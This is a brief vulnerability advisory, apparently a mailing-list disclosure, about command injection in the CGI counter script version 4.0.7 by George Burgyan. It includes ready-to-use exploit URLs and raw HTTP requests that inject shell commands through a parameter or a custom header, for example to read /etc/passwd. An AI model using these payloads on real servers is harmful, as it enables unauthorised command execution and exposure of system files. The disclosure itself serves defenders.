The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server. Of course, other exploits can be used to get root access on an unpatched OS. The counter consists of a perl script called "counter", and multiple links to counter called counter-ord, counterfiglet, counterfiglet-ord, counterbanner, and counterbanner-ord. The following examples illustrate how they can be exploited: Using straight URL ------------------ http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id Passing commands in a variable ------------------------------ > telnet web-server www GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0 X: pwd;ls -la /etc;cat /etc/passwd > telnet web-server www GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0 X: echo;id;uname -a;w The counter was last updated in 1995 so is probably no longer supported. Links and email addresses referenced in the source code are no longer valid. However, it appears to still be widely used based on the number of references returned by search engine queries. Howard Kash